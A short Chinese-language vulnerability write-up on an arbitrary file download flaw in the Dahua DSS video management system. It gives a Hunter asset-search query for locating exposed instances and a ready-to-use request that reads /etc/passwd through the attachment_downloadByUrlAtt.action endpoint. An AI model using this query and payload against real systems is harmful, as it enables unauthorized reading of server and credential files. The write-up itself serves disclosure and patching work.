登录 白背景

大华 DSS 视频管理系统 attachment_downloadByUrlAtt.action 任意文件下载漏洞

一、漏洞简介

大华 DSS 视频管理系统存在任意文件下载漏洞,攻击者通过漏洞可以下载服务器上的任意文件

二、影响版本

  • 大华 DSS 视频管理系统

三、资产测绘

  • hunter:app.name=="Dahua 大华 DSS 视频管理系统"

image.png

  • 登录页面

image.png

四、漏洞复现

/portal/attachment_downloadByUrlAtt.action?filePath=file:///etc/passwd

image.png

原文: https://www.yuque.com/xiaokp7/ocvun2/mb3iwwsxiz2bvrek